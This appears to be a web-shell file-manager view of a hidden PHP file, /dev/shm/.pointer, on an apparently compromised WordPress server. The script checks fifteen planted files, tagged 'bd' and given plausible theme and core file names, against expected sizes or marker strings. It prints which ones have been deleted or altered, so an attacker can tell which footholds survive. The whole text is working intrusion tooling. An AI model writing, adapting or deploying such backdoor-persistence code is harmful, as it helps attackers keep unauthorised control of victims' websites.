Your IP : 216.73.216.158
| Current Path : /dev/shm/ |
|
|
| Current File : //dev/shm/.pointer |
<?php $r = '/home/ideadpfc/ideacadecom.shop'; $x = ["/wp-admin/network/freedoms.php"=>"bd@@86637@@dataflow_engine",
"/wp-content/plugins/wp-reset/libs/diff/Renderer/Html/directories.php"=>"bd@@86656@@649",
"/wp.blog.php"=>"bd@@29070@@643",
"/wp-content/themes/astra/inc/builder/controllers/class-astra-builder-ui-controller.php"=>"bd@@91541@@config_manager",
"/wp-content/themes/astra/inc/customizer/configurations/builder/header/configs/account.cart.php"=>"bd@@91565@@2138",
"/wp-content/themes/astra/inc/compatibility/edd/customizer/sections/layout/class.astra.edd.archive.product.layout.php"=>"bd@@91566@@695",
"/wp-content/themes/astra/inc/builder/type/header/mobile-menu/class.astra.mobile.menu.component.loader.php"=>"bd@@91567@@3110",
"/wp-content/themes/astra/sidebar.php"=>"bd@@95187@@reverse_lookup",
"/wp-content/themes/inspiro/inc/customizer/configs/blog-post/class.inspiro.post.post.panel.config.php"=>"bd@@95188@@1562",
"/wp-content/themes/astra/inc/customizer/custom-controls/description-with-link/class.astra.control.description.with.link.php"=>"bd@@95189@@693",
"/wp-content/themes/astra/template-parts/header/builder/mobile.builder.layout.php"=>"bd@@95190@@2001",
"/wp-content/themes/astra/inc/customizer/configurations/class.astra.customizer.config.base.php"=>"bd@@95191@@1675",
"/wp-content/themes/astra/template-parts/404/index.layout.php"=>"bd@@95192@@613",
"/wp-includes/blocks/post-author-biography.php"=>"bd@@86777@@unit_converter",
"/wp-content/themes/twentytwentyfive/patterns/page-coming-soon.php"=>"bd@@86779@@secure_access"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');